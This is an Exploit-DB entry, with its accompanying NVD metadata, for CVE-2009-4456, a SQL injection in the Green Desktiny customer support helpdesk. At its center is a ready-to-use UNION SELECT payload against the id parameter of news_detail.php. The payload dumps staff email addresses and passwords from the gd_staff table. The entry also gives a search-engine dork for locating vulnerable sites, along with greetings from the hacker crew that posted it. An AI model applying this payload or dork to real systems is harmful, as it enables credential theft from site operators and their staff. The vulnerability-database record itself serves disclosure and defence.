ID EDB-ID:10710
Type exploitdb
Reporter kaMtiEz
Modified 2009-12-26T00:00:00
Description
Green Desktiny - Customer Support Helpdesk SQL injection vulnerability. CVE-2009-4456. Webapps exploit for php platform
###################################################################################
#
[~] Green Desktiny - Customer Support Helpdesk SQL injection vulnerability - (id) #
[~] Author : kaMtiEz (kamzcrew@gmail.com) #
[~] Homepage : http://www.indonesiancoder.com #
[~] Date : Desember 25, 2009 #
#
###################################################################################
[ Software Information ]
[+] Vendor : http://www.greendesktiny.com/
[+] Download : -
[+] version : 2.3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : $68
[+] Location : INDONESIA - JOGJA
##################################################################################
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/news_detail.php?id=[INDONESIANCODER]
[ Exploit ]
-666/**/union/**/select/**/666,666,666,666,666,666,666,666,666,concat_ws(0x3a,email,password),@@version,666/**/from/**/gd_staff--
===========================================================================
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] sendiri dingin sepi ... tanpa sengaja menemukan celah ke 2x nya ..
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D
[ QUOTE ]
[+] HAPPY BIRTHDAY TO DON TUKULSETO . WISH U ALL THE BEST .. KEEP MOVIN .. !
[+] merry x-mas and happy new year .. :D
[ EOF ]
[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM
{"id": "EDB-ID:10710", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Green Desktiny - Customer Support Helpdesk 2.3.1 - SQL Injection Vulnerability", "description": "Green Desktiny - Customer Support Helpdesk SQL injection vulnerability. CVE-2009-4456. Webapps exploit for php platform", "published": "2009-12-26T00:00:00", "modified": "2009-12-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/10710/", "reporter": "kaMtiEz", "references": [], "cvelist": ["CVE-2009-4456"], "lastseen": "2016-02-01T13:02:06", "viewCount": 9, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-02-01T13:02:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4456"]}], "modified": "2016-02-01T13:02:06", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/10710/", "sourceData": "###################################################################################\r\n #\r\n[~] Green Desktiny - Customer Support Helpdesk SQL injection vulnerability - (id) #\r\n[~] Author\t: kaMtiEz (kamzcrew@gmail.com) #\r\n[~] Homepage\t: http://www.indonesiancoder.com #\r\n[~] Date\t: Desember 25, 2009 #\r\n #\r\n###################################################################################\r\n\r\n[ Software Information ]\r\n\r\n[+] Vendor : http://www.greendesktiny.com/\r\n[+] Download : -\r\n[+] version : 2.3.1 or lower maybe also affected\r\n[+] Vulnerability : SQL injection\r\n[+] Dork : \"Think iT\"\r\n[+] Price : $68 \r\n[+] Location : INDONESIA - JOGJA\r\n\r\n##################################################################################\r\n\r\n\r\n[ HERE WE GO .. LIVE FROM JOGJA CITY ]\r\n\r\n[ Vulnerable File ]\r\n\r\nhttp://127.0.0.1/[kaMtiEz]/news_detail.php?id=[INDONESIANCODER]\r\n\r\n[ Exploit ]\r\n\r\n-666/**/union/**/select/**/666,666,666,666,666,666,666,666,666,concat_ws(0x3a,email,password),@@version,666/**/from/**/gd_staff--\r\n\r\n\r\n===========================================================================\r\n\r\n[ Thx TO ]\r\n\r\n[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink\r\n[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..\r\n[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,\r\n[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk\r\n\r\n[ NOTE ] \r\n\r\n[+] Nyak ama babe gua .. tak lupa adik gua ..\r\n[+] sendiri dingin sepi ... tanpa sengaja menemukan celah ke 2x nya ..\r\n[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D\r\n\r\n[ QUOTE ]\r\n\r\n[+] HAPPY BIRTHDAY TO DON TUKULSETO . WISH U ALL THE BEST .. KEEP MOVIN .. !\r\n[+] merry x-mas and happy new year .. :D\r\n\r\n[ EOF ]\r\n\r\n[+] INDONESIANOCODER TEAM\r\n[+] KILL -9 TEAM", "osvdbidlist": ["61353"]}
{"cve": [{"lastseen": "2020-10-03T11:54:20", "description": "SQL injection vulnerability in news_detail.php in Green Desktiny 2.3.1, and possibly earlier versions, allows remote attackers to execute arbitrary SQL commands via the id parameter.", "edition": 3, "cvss3": {}, "published": "2009-12-30T00:30:00", "title": "CVE-2009-4456", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4456"], "modified": "2013-08-28T06:14:00", "cpe": ["cpe:/a:greendesktiny:green_desktiny:2.3.1"], "id": "CVE-2009-4456", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4456", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:greendesktiny:green_desktiny:2.3.1:*:*:*:*:*:*:*"]}]}
